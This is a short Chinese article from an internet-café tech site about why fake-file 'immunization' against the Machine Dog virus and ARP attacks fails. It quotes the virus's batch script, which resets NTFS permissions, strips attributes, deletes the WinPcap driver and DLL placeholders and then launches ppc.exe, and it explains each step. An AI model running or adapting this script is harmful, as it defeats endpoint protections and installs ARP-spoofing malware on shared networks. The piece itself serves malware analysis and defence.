机器狗以及ARP攻击免疫失效的原因

2007-11-27网络收集佚名

【大中小】

以下为引用的内容：
cacls %systemroot%\system32\drivers\npf.sys /e /p everyone:f
ping 127.0.0.1
cacls %systemroot%\system32\npptools.dll /e /p everyone:f
ping 127.0.0.1
cacls %systemroot%\system32\Packet.dll /e /p everyone:f
ping 127.0.0.1
cacls %systemroot%\system32\WanPacket.dll /e /p everyone:f
ping 127.0.0.1
cacls %systemroot%\system32\wpcap.dll /e /p everyone:f
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\drivers\npf.sys
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\npptools.dll
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\Packet.dll
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\WanPacket.dll
ping 127.0.0.1
attrib -r -h -s /s /d %systemroot%\system32\wpcap.dll
ping 127.0.0.1
rd %systemroot%\system32\drivers\npf.sys
ping 127.0.0.1
rd %systemroot%\system32\npptools.dll
ping 127.0.0.1
rd %systemroot%\system32\Packet.dll
ping 127.0.0.1
rd %systemroot%\system32\WanPacket.dll
ping 127.0.0.1
rd %systemroot%\system32\wpcap.dll
ping 127.0.0.1
Del %systemroot%\system32\drivers\npf.sys
ping 127.0.0.1
Del %systemroot%\system32\npptools.dll
ping 127.0.0.1
Del %systemroot%\system32\Packet.dll
ping 127.0.0.1
Del %systemroot%\system32\WanPacket.dll
ping 127.0.0.1
Del %systemroot%\system32\wpcap.dll
ping 127.0.0.1
ppc.exe
Exit

简单说一下,原因就是,病毒释放随机批处理,首先去掉NTFS权限,
进一步去掉文件属性
再进一步删掉空文件夹
最后删掉空文件
最后运行ARP欺骗的病毒.厉害吧,呵呵,所以假文件免疫的,不要再自欺欺人了.

更进一步,可以删掉cacls等外部命令,再禁止cmd,再更改bat文件关联.又可以防一时,如果病毒用程序达到以上目的,不需要批处理的话,那又没办法了.

本文来源：网络收集作者：佚名

上一篇文章：网吧遭离奇病毒袭击新病毒“机器狗”被截获

下一篇文章：神不知鬼不觉地置换 XP用户密码

没有相关文章

聚合推荐

2022年网吧恢复营业时间网吧卫生网吧电脑配置开网吧网吧键盘网吧配置网吧GHOST ROS 网吧软件故障解决网众无盘网吧游戏菜单网吧活动网吧优化网吧精品网吧新手

声明

声明：本站所发表的文章、评论及图片仅代表作者本人观点，与本站立场无关。文章是出于传递更多信息之目的。若有来源标注错误或侵犯了您的合法权益，请作者持权属证明与本网联系，我们将及时更正、删除，谢谢。 Email:support@txwb.com，系统开号，技术支持，服务联系微信：_WX_1_本站所有有注明来源为天下网吧或天下网吧论坛的原创作品，各位转载时请注明来源链接！

天下网吧·网吧天下